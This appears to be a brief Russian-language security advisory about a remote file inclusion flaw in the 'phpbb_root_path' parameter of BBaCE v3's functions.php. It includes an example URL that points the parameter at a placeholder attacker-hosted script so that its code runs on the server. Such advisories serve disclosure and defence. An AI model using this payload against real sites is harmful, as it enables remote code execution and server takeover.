Программа: BBaCE v3
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре " phpbb_root_path" сценарием functions.php.
Пример:
http://site.com/[path]/includes/functions.php?phpbb_root_path=http://[Evil_script]